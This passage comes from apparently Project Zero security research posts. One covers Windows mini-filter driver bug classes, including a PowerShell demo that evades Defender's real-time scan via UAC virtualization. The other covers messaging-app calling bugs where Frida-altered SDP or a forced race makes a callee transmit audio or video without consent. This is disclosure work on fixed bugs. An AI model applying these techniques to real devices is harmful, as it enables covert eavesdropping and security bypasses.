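    return mode == KERNEL_MODE || caller_has_privilege;
}
```

A fixed version of the earlier callback would pass the result of effective_mode (computed from the real fields) to the privilege check rather than Data->RequestorMode.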

Driver and Kernel IO Operation Mismatch

The Windows platform is constantly gaining new features, even more so since the release of Windows 10 and its six-month release cycle. This can add new features to the IO stack, such as new information classes or IO control codes, or extend the functionality of existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about. However, if it does process an IO operation, its handling needs to match what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue CVE-2020-17139 resulted from the OS adding a new FSCTL_SET_REPARSE_POINT_EX IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF reparse tag, which provided a way to give an arbitrary file a cached code signature and bypass mechanisms such as Windows Defender Application Control.
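The shape of this bug can be reduced to a toy filter check. In the sketch below the control codes are symbolic, hypothetical enum values rather than the real FSCTL numbers, and IO_REPARSE_TAG_WOF is the header value. The "old" check only knows one way to set a reparse point; the "fixed" check enumerates every code that can set one.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define IO_REPARSE_TAG_WOF 0x80000017u

/* Symbolic stand-ins; the real FSCTL numbers do not matter for the logic. */
enum fsctl { SET_REPARSE_POINT, SET_REPARSE_POINT_EX, OTHER_FSCTL };

/* Written before the _EX variant existed: only one way in is blocked. */
static bool old_filter_blocks(enum fsctl code, uint32_t tag) {
    return code == SET_REPARSE_POINT && tag == IO_REPARSE_TAG_WOF;
}

/* Every code that can set a reparse point must be covered. */
static bool sets_reparse_point(enum fsctl code) {
    switch (code) {
    case SET_REPARSE_POINT:
    case SET_REPARSE_POINT_EX:
        return true;
    default:
        return false;
    }
}

static bool fixed_filter_blocks(enum fsctl code, uint32_t tag) {
    return sets_reparse_point(code) && tag == IO_REPARSE_TAG_WOF;
}
```

Even the fixed version only covers the codes its author knew about, which is exactly why this bug class recurs as the OS evolves.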

Altitude Sickness

Sorry, I couldn’t resist the pun. This bug class is caused by the ordering of filter operations based on the altitudes assigned to the drivers. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post, you’ll notice that WdFilter, the real-time scanner for Windows Defender, is at a much higher altitude than LUAFV, the UAC file virtualization driver.

This means that if LUAFV performs some operations itself, such as calling FltCreateFileEx, which only dispatches the IO request to filters below LUAFV, then Windows Defender will miss those file operations and won’t be able to act on them. Let’s show this in action with a simple PowerShell script.
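To make the ordering concrete, here is a toy C model of a filter stack, sorted from highest to lowest altitude. A request issued by a filter only reaches instances below the issuer's altitude, while a user-mode request is modelled with an issuer altitude above every filter. The 385200 Process Monitor altitude and the reattach altitude of 100 come from this post; the WdFilter and LUAFV altitudes are illustrative assumptions.

```c
#include <assert.h>
#include <stddef.h>

/* One attached filter instance; `seen` counts requests it was called for. */
struct filter_instance {
    const char *name;
    unsigned altitude;
    int seen;
};

/* Calls every instance strictly below `issuer_altitude`, highest first.
   The stack must be sorted by descending altitude. */
static void dispatch_from(struct filter_instance *stack, size_t count,
                          unsigned issuer_altitude) {
    for (size_t i = 0; i < count; ++i) {
        assert(i == 0 || stack[i - 1].altitude > stack[i].altitude);
        if (stack[i].altitude < issuer_altitude)
            stack[i].seen++;
    }
}
```

With a stack of PROCMON24 (385200), WdFilter (illustrative 328010), luafv (illustrative 135000) and a low PROCMON24 instance at 100, a request issued from LUAFV's altitude is only seen by the low instance, which is why reattaching Process Monitor lower reveals extra events.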

function Write-EICAR {
    param([string]$Path)
    # Replace with a real EICAR string.
    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")
    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {
        $f.Length = 0
        Write-NtFile $f $eicar -Offset 0
    }
}

PS> Write-EICAR -Path "$env:TEMP\eicar.txt"

PS> Enable-NtTokenVirtualization

PS> Write-EICAR -Path "$env:windir\system32\license.rtf"

The Write-EICAR function opens or creates a file at the specified path, truncates it to zero length, writes the EICAR string and then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and substitute it before running the test. I did this to prevent overzealous AV from detecting the EICAR string and quarantining this web page.

The first command creates an EICAR file in the temporary folder. Once the file has been closed, Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file, the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command succeeds. Note that the file which is actually created is in the user’s virtual store; we’ve not overwritten license.rtf.

It’s worth pointing out that this only allows you to create the file on disk. The instant any application uses that virtualized file, Windows Defender will see it and quarantine it. Therefore it provides no real value for bypassing Windows Defender’s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to differing altitudes.

The mismatch in filter altitude is also a potential reason you’ll miss file events in Process Monitor. Process Monitor runs its mini-filter to capture file events at altitude 385200, which is above LUAFV, so you will not see most direct virtualization events. However, we can do something about this: we can use fltmc to detach the Process Monitor filter from a volume and reattach it at a much lower altitude. Start Process Monitor, then run the following commands to reattach to the C: drive.

C:\> fltmc detach PROCMON24 C:

C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100

You might need to replace 24 with the appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly, although you can try to attach the Process Monitor filter to the named pipe device, it won’t work, as the driver doesn’t indicate support for that device.

Note that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low-altitude instance. If you create the new instance without an instance name (the string after -i), it won’t get deleted; however, Process Monitor will then show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line option. This is one of those cases where it’d be useful for the tooling to be open source, so that such a feature could be added.

As an example, before adding the low-altitude instance, if you create the EICAR test file you’ll see the following events:
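[Table: Process Monitor events for the EICAR test at the default altitude, with an added ID column. Only these Detail entries survived, in order: "Desired Access: Read Data, Write Data"; "EndOfFile: 0"; "Offset: 0, Length: 68".]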

I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file: we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is “delay virtualized”, so the virtual file is only created when a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:
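[Table: Process Monitor events for the same test with the filter attached at altitude 100 (some events removed). Only these Detail entries survived, in order: "Desired Access: Read Data, Write Data"; "Desired Access: Read Data"; "Desired Access: Read Data, Read Attributes"; "Desired Access: Write Data, Write Attributes"; "EndOfFile: 538"; "Offset: 0, Length: 538" (twice); "Offset: 538, Length: 16,384"; "Desired Access: Read Data, Write Data"; "EndOfFile: 0"; "Offset: 0, Length: 68, Priority: Normal".]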

You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). Event 0 is no longer a single create IO request for the license.rtf file. As the user doesn’t have write access, the create call to the file system results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and, as virtualization is enabled, makes a second create requesting only read access. This second create succeeds. Due to LUAFV’s altitude, this process is normally hidden from Process Monitor.

In event ID 2 of the first table we saw the caller setting the file length to 0. In the second table, however, we now see that the virtual file needs to be created and the contents of the original file copied into it. Only after that operation has completed is the length of the file set to 0. The last two events are more or less the same.
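The delay virtualization behavior seen in the trace can be sketched as copy-on-first-write. This is a toy model with hypothetical names, not LUAFV's implementation: reads go to the original until the first modifying operation, which copies the original into the virtual store and only then applies the change.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Toy delay-virtualized handle; names are hypothetical. */
struct vfile {
    const char *original;   /* contents of the protected original file */
    char virtual_copy[64];  /* per-user virtual store file contents */
    bool virtualized;       /* has the copy been made yet? */
};

/* First write-type operation: copy the original into the virtual store. */
static void ensure_virtualized(struct vfile *f) {
    if (!f->virtualized) {
        size_t n = strlen(f->original);
        assert(n < sizeof f->virtual_copy);
        memcpy(f->virtual_copy, f->original, n + 1);
        f->virtualized = true;
    }
}

/* Models setting the end of file, like "$f.Length = 0" in the script. */
static void set_length(struct vfile *f, size_t len) {
    ensure_virtualized(f);           /* copy happens before the truncate */
    if (len < strlen(f->virtual_copy))
        f->virtual_copy[len] = '\0'; /* only the virtual copy changes */
}

static const char *read_contents(const struct vfile *f) {
    return f->virtualized ? f->virtual_copy : f->original;
}
```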

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. Multiple threads can call into the same IO driver at the same time, and the filter manager is no different: there’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.

The filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.

An example of this kind of issue is CVE-2019-0836 which was a race condition in the LUAFV driver related to handling of the SECTION_OBJECT_POINTERS structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.

To avoid this problem, the driver should not maintain complex state between pre- and post-operation callbacks, or across calls to any API which a user-mode application could trap.
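One common way to keep state out of shared per-file contexts is to carry it per request, for example through the CompletionContext passed from pre- to post-operation callbacks. The sequential C sketch below simulates two interleaved requests on the same file; the structures are hypothetical, and this pattern does not by itself fix every race (such as the one in CVE-2019-0836).

```c
#include <assert.h>

/* Shared per-file state, like a context attached to a stream. */
struct file_state { int last_target; };

/* Per-request state, like a value handed from pre- to post-op. */
struct request_ctx { int target; };

/* Fragile: pre-op stores into shared state ... */
static void pre_shared(struct file_state *fs, int target) { fs->last_target = target; }
/* ... and post-op reads it back, possibly after another request overwrote it. */
static int post_shared(const struct file_state *fs) { return fs->last_target; }

/* Safer: each request carries its own state through the operation. */
static void pre_private(struct request_ctx *ctx, int target) { ctx->target = target; }
static int post_private(const struct request_ctx *ctx) {
    assert(ctx != 0);
    return ctx->target;
}
```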

Incorrect Forwarding of IO Operations

We showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully, because almost any operation can be performed on a file object pointer directly. For example, even if a file is opened read-only, a write operation can still be dispatched to the file object itself and it’ll succeed.

The only thing which prevents a user-mode application from doing this is the kernel’s check that the handle passed to the NtWriteFile system call has the FILE_WRITE_DATA access right. If it doesn’t, the system call returns STATUS_ACCESS_DENIED. However, if the handle has write access to one file object, but the filter driver redirects that operation to a file object opened read-only, the check is bypassed and the user can write to a file they don’t necessarily control.

Another place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates whether the file handle requires read and/or write access for it to be dispatched. This check is performed in the IO manager before the request ever reaches the file system. If a filter driver blindly forwards IO control codes to a separate file, it could send a code which normally requires write access on the handle, bypassing security checks.
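A small model shows why the check has to be repeated when forwarding. The sketch reads the 2-bit required-access field from bits 14-15 of a control code and compares it with a handle's granted access, roughly as the IO manager does. The access constants match winnt.h and the Windows headers; forward_allowed is a hypothetical helper for a redirecting filter.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Access-mask bits (winnt.h). */
#define FILE_READ_DATA  0x0001u
#define FILE_WRITE_DATA 0x0002u
/* Values of a control code's 2-bit required-access field. */
#define FILE_READ_ACCESS  0x1u
#define FILE_WRITE_ACCESS 0x2u

static uint32_t ctl_required_access(uint32_t code) { return (code >> 14) & 3u; }

/* Models the IO manager's check before dispatching a control code. */
static bool access_allows(uint32_t code, uint32_t granted) {
    uint32_t req = ctl_required_access(code);
    if ((req & FILE_READ_ACCESS) && !(granted & FILE_READ_DATA)) return false;
    if ((req & FILE_WRITE_ACCESS) && !(granted & FILE_WRITE_DATA)) return false;
    return true;
}

/* Hypothetical redirecting filter: the IO manager only checked the
   caller's handle, so re-check against the target file object's access. */
static bool forward_allowed(uint32_t code, uint32_t handle_granted,
                            uint32_t target_granted) {
    assert(access_allows(code, handle_granted));
    return access_allows(code, target_granted);
}
```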

The LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836, while a concurrency issue, also relies on the fact that the file object can be written to even though it was opened read-only.


In summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that’s because they’re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I’ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.

If you want more information, a good blog on the inner workings of filter drivers is Of Filesystems and Other Demons. It’s not been updated in a long while, but it still contains some valuable information. You can also refer to MSDN, which has a fairly comprehensive section on mini-filters, as well as the Windows Driver Kit sample code. Finally, as a reminder, I’ve uploaded a filter manager header file for use in reverse engineering tools such as IDA Pro.

The State of State Machines

Posted by Natalie Silvanovich, Project Zero

On January 29, 2019, a serious vulnerability was discovered in Group FaceTime which allowed an attacker to call a target and force the call to connect without user interaction from the target, allowing the attacker to listen to the target’s surroundings without their knowledge or consent. The bug was remarkable in both its impact and mechanism. The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device. While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine -- an attack scenario I had never seen considered on any platform -- made me wonder whether other state machines had similar vulnerabilities as well. This post describes my investigation into calling state machines of a number of messaging platforms, including Signal, JioChat, Mocha, Google Duo, and Facebook Messenger.

WebRTC and State Machines

The majority of video conferencing applications are implemented using WebRTC, which I’ve discussed in several past blog posts. WebRTC connections are created by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process called signalling. Signalling is not implemented by WebRTC, which allows peers to exchange SDP over whatever secure communication channel is available to them, usually WebSockets for web applications and secure messaging for messaging applications.

There are a few types of SDP that can be exchanged by WebRTC peers. In a typical connection, the caller starts off by sending an SDP offer, and then the callee responds with an SDP answer. These messages contain most of the information needed to transmit and receive media, including codec support, encryption keys and much more. After the offer/answer exchange, peers can send SDP candidates to other peers. Candidates are potential network paths that the two peers can use to connect to each other, and SDP candidates contain information such as IP addresses and TURN servers. Peers usually send more than one candidate to a peer, and candidates can be sent at any time during a connection.

WebRTC connections maintain an internal state related to whether an offer or answer has been received and processed; however, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application. How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences. For example, some applications do not exchange any SDP until the callee user has interacted with the application to answer the call, while others set up the peer-to-peer connection and start sending audio and video from caller to callee before the callee is even notified of the call.

Regardless of design, transmitting audio or video from an input device must be directly enabled by application code using WebRTC. This is usually done using a feature called tracks. Every input device is considered a ‘track’, and each specific track must be added to a specific peer connection by calling addTrack (or language equivalent) before audio or video is transmitted. Tracks can also be disabled, which is useful for implementing mute and camera-off features. Each track also has an RTPSender property that can be used to fine-tune the properties of transmission, which can also be used to disable audio or video transmission.

Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.

Signal Messenger

I looked at Signal in September 2019, and at that time the application had a calling setup very similar to what is recommended in WebRTC documentation.

A peer-to-peer connection is established, and then the callee's audio track is added to the connection when the callee accepts the call by interacting with the user interface. Then a message is sent to the caller via the peer-to-peer connection, telling it to also move to the connected state and add the track.

Unfortunately, the application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings. I tested this bug by changing Signal’s open-source code to send the message and recompiling the attacking client.

This vulnerability was fixed in the client in September 2019, and since then, Signal’s signalling code has been replaced by the ringrtc project, which uses a more conservative state machine.

This bug was purely in Signal’s code, and was not due to a misunderstanding of WebRTC functionality. The state machine design was largely effective at requiring user consent to transmit audio, but a specific check was not implemented.
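The missing check amounts to validating the device's role before acting on a connect message. Below is a toy C state machine, with hypothetical names and not Signal's code, in which the callee only adds its audio track when the local user accepts, and a connect message is only honoured by the caller.

```c
#include <assert.h>
#include <stdbool.h>

enum role { CALLER, CALLEE };
enum call_state { RINGING, CONNECTED };

struct call {
    enum role role;
    enum call_state state;
    bool audio_track_added; /* transmission only starts once this is set */
};

/* The local user tapped "accept": only meaningful on the callee. */
static void on_user_accept(struct call *c) {
    assert(c->role == CALLEE);
    c->state = CONNECTED;
    c->audio_track_added = true;
}

/* A connect message arrived from the peer. Only the caller should act on
   it; the role check is the one that was missing. Returns true if used. */
static bool on_peer_connect_message(struct call *c) {
    if (c->role != CALLER || c->state != RINGING)
        return false;
    c->state = CONNECTED;
    c->audio_track_added = true;
    return true;
}
```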

JioChat and Mocha

I accidentally found two very similar vulnerabilities in JioChat and Mocha messengers in July 2020 while testing whether a WebRTC exploit would work on them. They both had a similar signalling design, which was server-mediated.

The offer and answer are exchanged via the server, and then both the caller and the callee send their candidates to the server. The server then stores them until the callee interacts with their device and accepts the call. Then the peer-to-peer connection is created, and when WebRTC enters into its internal connected state, the track is added, causing audio and video to be transmitted.

This design has a fundamental problem: candidates can optionally be included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, and the connection in turn leads to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed, by filtering SDP on the server.
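What "filtering SDP on the server" might look like is sketched below, under the assumption that it means removing a=candidate attribute lines from offers and answers; the post does not describe the actual server-side filter. Note that, per the next paragraph, gating on candidates remains a fragile design even with such a filter.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies `sdp` into `out`, dropping "a=candidate" attribute lines.
   Returns the output length, or (size_t)-1 if `out` is too small. */
static size_t strip_candidates(const char *sdp, char *out, size_t out_size) {
    assert(sdp != NULL && out != NULL && out_size > 0);
    size_t used = 0;
    const char *line = sdp;
    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) + 1 : strlen(line);
        if (strncmp(line, "a=candidate", 11) != 0) {
            if (used + len >= out_size) return (size_t)-1; /* keep room for NUL */
            memcpy(out + used, line, len);
            used += len;
        }
        line += len;
    }
    out[used] = '\0';
    return used;
}
```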

These issues were caused by a misunderstanding of how WebRTC works coupled with an attempt to improve WebRTC performance with an unusual signalling design. Normally, WebRTC integrators have to decide whether to wait until the callee has answered the call to set up the peer-to-peer connection. Setting the connection up early improves performance and prevents the user from having to wait when they answer a call, but also greatly increases the remote attack surface of WebRTC. These applications tried to improve performance without the security cost with this design, but didn’t consider all the ways that WebRTC can start a peer-to-peer connection.

It is generally not a good idea for integrators to gate audio or video transmission on any WebRTC feature that is not adding or enabling tracks. To start, many WebRTC features are complex, so it is easy to make a mistake that allows audio or video to be transmitted. Also, if the feature that is gated on is not commonly-used or not a security feature, it could be poorly tested or changed in the future.

Google Duo

I looked at Google Duo in September 2020. Duo’s signalling methodology is somewhat different from a lot of messengers because it supports a feature that allows the callee to preview the caller’s video before answering. So a one-way video stream needs to be set up before the call is answered.

The image above shows the setup of the one-way video stream. Dotted lines represent asynchronous calls made using Java executors. The lack of transmission from callee to caller is enforced by two methods. First, the SDP offer contains the property a=sendonly for video, which causes video to only be transmitted in one direction. Also, when the callee receives the offer from the caller, it adds the video track to the peer connection, but then disables it using the RTPSender property of the track (the audio track is not added or enabled until the user accepts the call).

Neither of these methods effectively prevents video from being transmitted from callee to caller. The SDP property is easy to get around because the caller provides the SDP to the callee, so it can be easily altered. Disabling the video track as soon as the offer is processed should work, except for the asynchronous design. Normally, the setLocalDescription method (which processes the SDP offer) calls the callback onSetSuccess, and then sets up the peer-to-peer connection after the callback has finished. However, if the callback makes another asynchronous call, the guarantee that onSetSuccess finishes before the connection is set up no longer holds, because the setLocalDescription method only waits for the onSetSuccess thread to finish. This creates a race between disabling the video and setting up the connection, so in some situations, the callee could transmit a few video frames to the caller before transmission is disabled.

I tested this by using Frida to alter the SDP sent by the callee, and then I tried many methods to win the race. It turned out to be fairly hard to win, and I spent roughly two weeks trying to figure out how to slow down the video disable call enough to give the connection time to set up. I ended up sending multiple offers and adding candidates to the offers, which decreased the connection time, as the network connection was already established. Then I sent many messages that take a long time to process through the data channel of the peer-to-peer connection to slow down the disabling of the video track. Data messages are processed on the same thread queue as disabling the video track in Duo, so sending data messages filled up the queue that was needed to disable video with many other entries, delaying the track being disabled.

This bug was fixed in December 2020 by removing the asynchronous call from onSetSuccess. While Duo generally designed signalling in a way that is effective in preventing video transmission from callee to caller, implementing the design asynchronously introduced problems. Asynchronous signalling implementations are becoming more common on mobile applications, as there are many unpredictable situations in which WebRTC needs to wait on the network or a peer, and separating function calls into different threads means a delay in one call won’t affect unrelated functionality. However, asynchronous calls make it more difficult to model how a state machine will behave in all situations, so it is important to be cautious about adding asynchronous calls to WebRTC signalling. In this case, the asynchronous call to disable the video track added nothing in terms of performance, as there is no reason any of the calls made to disable the track could block, and onSetSuccess already runs in its own thread and can yield to higher priority threads. It’s important to balance the risk and benefit of asynchronous calls and not indiscriminately include them in an application.
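The ordering problem can be reproduced in a single-threaded toy model, which is not Duo's code. The callback either schedules the video disable on a task queue that already holds data-channel messages, or disables the track before returning. The connection comes up once the callback returns, and each tick sends a frame if video is still enabled, then runs one queued task.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model of the ordering problem; all names are hypothetical. */
struct sim {
    bool video_enabled;
    bool connected;
    int frames_leaked;     /* frames sent while video should be off */
    int pending_data_msgs; /* data-channel messages queued ahead of the disable */
    bool disable_queued;
};

/* Variant A: the callback only schedules the disable asynchronously. */
static void on_set_success_async(struct sim *s) { s->disable_queued = true; }

/* Variant B: the callback disables the track before returning. */
static void on_set_success_sync(struct sim *s) { s->video_enabled = false; }

/* Waits for the callback to return, then the connection comes up and the
   task queue drains one task per tick. */
static void run(struct sim *s, void (*callback)(struct sim *)) {
    assert(s != 0 && callback != 0);
    callback(s);
    s->connected = true;
    while (s->pending_data_msgs > 0 || s->disable_queued) {
        if (s->video_enabled)
            s->frames_leaked++;     /* a frame goes out this tick */
        if (s->pending_data_msgs > 0) {
            s->pending_data_msgs--; /* earlier tasks run first */
        } else {
            s->video_enabled = false;
            s->disable_queued = false;
        }
    }
}
```

With three queued data messages, the asynchronous variant leaks four frames before the disable runs, while the synchronous variant leaks none, which mirrors why removing the asynchronous call fixed the bug.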

Facebook Messenger

I looked at Facebook Messenger in October 2020. It was a fairly challenging target because of the amount of reverse engineering required. Stepping back a bit, WebRTC has bindings in several programming languages which allow it to be integrated into applications using that language. Most Android applications that integrate WebRTC use the Java bindings. This makes investigating signalling state machines fairly straightforward, as important Java functions, such as setLocalDescription (which processes offers and answers), addRemoteIceCandidate (which processes candidates) and addTrack (which adds tracks to connections) can be hooked in Frida and logged for analysis. It is also reasonably straightforward to change the behavior of the attacker device using these calls.

Facebook Messenger does not use Java bindings to integrate WebRTC, instead it uses C++ bindings. Moreover, it statically links WebRTC to a larger library (, which is likely the rsys library mentioned in this article), so the symbols for calls to bindings get stripped, making them difficult to hook. In addition, Facebook Messenger serializes SDP into another format before it is transmitted, so it is difficult to determine how signalling works by monitoring traffic.

I eventually realized that the only reasonable way to figure out how Facebook Messenger signalling works was to figure out its network protocol. Thankfully, Facebook has publicly stated that they use fbthrift, a fork of thrift. I loaded the library into IDA to see if I could find where it called into the thrift library, but while there were a few calls, it looked like the code was mostly statically linked. I eventually figured out that this is because thrift generates serialization code for every protocol implemented, so most of the serialization and deserialization code ends up compiled with the protocol processing code. So I decided to compile fbthrift, make a sample serializer and look at it in IDA, to get an impression of what compiled fbthrift serializers look like. I noticed that during serialization, members of an object are serialized by calling a method called writeFieldBegin. I also noticed that when this method is called, the field name is required, even though it is usually not included in the serialized output. So I looked for a function in librtcR20 that was very frequently called with different string parameters that seemed reasonable for field names. Not many functions met that criterion, so I was able to identify writeFieldBegin.

At this point, I could find many places where objects are serialized, and needed to identify which one was the message used to set up WebRTC calls.

Earlier, I’d noticed a method in the library called P2PCall::OnP2PMessageFromPeer (note that the symbol for this method is stripped, but the method name is logged when it is called). This seemed a likely place that a deserialized message would be processed. Searching for the string “P2PMessage”, I found the serialization code for a type called P2PMessageRequest. I assumed that this was where call setup messages were created.

Thrift serialization code is generated based on class definitions in a thrift definition file. Based on the field names and types passed to writeFieldBegin, I was able to slowly reverse engineer the complete thrift definition for this type. It was tedious work, because the definition was fairly long, and the code is obfuscated in a way that makes register use inconsistent, so I wasn’t confident that any automated approach would be accurate.

Below is a sample of the serialization code.

Notice that it writes two fields from an object of type Extmap. The first, named id, is a mandatory field. The function that writes the code is as follows.

The field identifier written is 1, and the field type is 8, which translates to i32 (32-bit integer). The second field is an optional field, and the registers to write it are set in the following code.

This sets the field name to uri, the field identifier to 2, and the field type to 8 (also i32). All together, this code can be represented by the following thrift definition.


struct Extmap {
        1: i32 id
        2: optional i32 uri
}

After similarly reverse engineering every field of the P2PMessageRequest type, I had a complete thrift definition, available here.
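Assuming, again, thrift's binary protocol as the wire format, the Extmap definition above would serialize roughly as follows: each present field is a header plus its value, an unset optional field is omitted entirely, and a T_STOP byte ends the struct. This is a hand-written illustration of the encoding, not fbthrift's generated code.

```python
import struct
from dataclasses import dataclass
from typing import Optional

T_STOP = 0
T_I32 = 8


@dataclass
class Extmap:
    id: int                    # 1: i32 id (required)
    uri: Optional[int] = None  # 2: optional i32 uri


def serialize_extmap(m: Extmap) -> bytes:
    out = bytearray()
    # Field 1: header (type 8 = i32, id 1) followed by the big-endian i32 value.
    out += struct.pack(">bhi", T_I32, 1, m.id)
    # Field 2 is optional: it is only written when it has a value.
    if m.uri is not None:
        out += struct.pack(">bhi", T_I32, 2, m.uri)
    out += struct.pack(">b", T_STOP)  # end of struct
    return bytes(out)


print(serialize_extmap(Extmap(id=3)).hex())  # → 0800010000000300
```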

I did two things with this thrift definition. First, I used it to determine the layout of the P2PMessageRequest type in C++. This was extremely valuable, as it allowed me to load the struct definition into IDA with every single field named correctly, which made it much easier to understand how incoming messages are handled in P2PCall::OnP2PMessageFromPeer. This ended up being a bit of a process. fbthrift can generate C++ header files directly from a thrift definition, but these are very long, contain a lot of unnecessary definitions, and cannot be processed by IDA. So I ended up compiling the generated source, loading it into IDA, exporting the structure definitions and importing them into another IDA instance where the library was already loaded. A few fields had different sizes in my compilation versus Facebook's, but it was close enough that I could get it to work with a few modifications.

Below is an example of code decompiled in IDA with the thrift definition imported, to give an idea of how much easier it makes it to understand the processing of the message object.

I was also able to decode and generate messages sent over the network. To do this, I generated the serialization code from the thrift definition in Python, as thrift supports code generation in many languages. Then, I was able to import this code when using Frida Python to hook functions in Facebook Messenger.

Then I needed to find the code that handled incoming P2PMessageRequest messages. Since these messages are handled by native code, whereas most Facebook messages are handled by Java code, I looked for a native method with an appropriate name and found com.facebook.webrtc.WebrtcEngine.onThriftMessageFromPeer. I hooked this method with Frida, fed its byte array parameter into the generated deserializer, and it decoded incoming messages.
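The author decoded these byte arrays with Python code generated from the reconstructed definition. Before such a definition exists, a generic walker can still dump field IDs and values, which helps when matching captured messages against reverse-engineered types. The sketch below assumes the binary protocol and supports only scalar, string and nested-struct fields (lists, sets and maps raise an error); decode_struct is a hypothetical helper.

```python
import struct

T_STOP, T_BOOL, T_BYTE, T_I16, T_I32, T_I64, T_STRING, T_STRUCT = 0, 2, 3, 6, 8, 10, 11, 12

# Fixed-size scalar types and their big-endian struct formats.
SCALARS = {T_BYTE: ">b", T_I16: ">h", T_I32: ">i", T_I64: ">q"}


def decode_struct(data: bytes, pos: int = 0):
    """Decode one binary-protocol struct starting at `pos`.

    Returns ({field_id: value}, position just after the T_STOP byte).
    """
    fields = {}
    while True:
        ftype = data[pos]
        pos += 1
        if ftype == T_STOP:
            return fields, pos
        (fid,) = struct.unpack_from(">h", data, pos)
        pos += 2
        if ftype in SCALARS:
            fmt = SCALARS[ftype]
            (fields[fid],) = struct.unpack_from(fmt, data, pos)
            pos += struct.calcsize(fmt)
        elif ftype == T_BOOL:
            fields[fid] = data[pos] != 0
            pos += 1
        elif ftype == T_STRING:  # i32 length prefix, then raw bytes
            (n,) = struct.unpack_from(">i", data, pos)
            pos += 4
            fields[fid] = data[pos:pos + n]
            pos += n
        elif ftype == T_STRUCT:  # nested struct: recurse
            fields[fid], pos = decode_struct(data, pos)
        else:
            raise ValueError(f"unsupported type {ftype} for field {fid}")


print(decode_struct(bytes.fromhex("0800010000000300")))  # → ({1: 3}, 8)
```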

I found a similar method used to send thrift messages, sendThriftToPeer (this method’s class name is obfuscated and changes in every version of Facebook Messenger, but it can be found by grepping the application’s smali). I was also able to hook this method, and alter its byte array parameter, to change a P2PMessageRequest message sent by Facebook Messenger.

Now, I was able to understand Facebook Messenger’s signalling state machine. There are two different ways that signalling can occur, depending on where the user is signed into Facebook Messenger. If the user is signed in on multiple devices or browsers, very little happens before the callee interacts with their device. The offer, answer and candidates are exchanged, but they are stored by the callee device and not processed until the callee user answers the call. This makes sense, because Facebook Messenger doesn’t know what device to connect to otherwise.

If the callee is only signed in on a single device, the state machine is more interesting.

In this case, Facebook Messenger enables the track as soon as an offer is received, but alters the offer so that all outgoing streams are inactive. It then replaces the offer with one where they are active when the user interacts with the device.

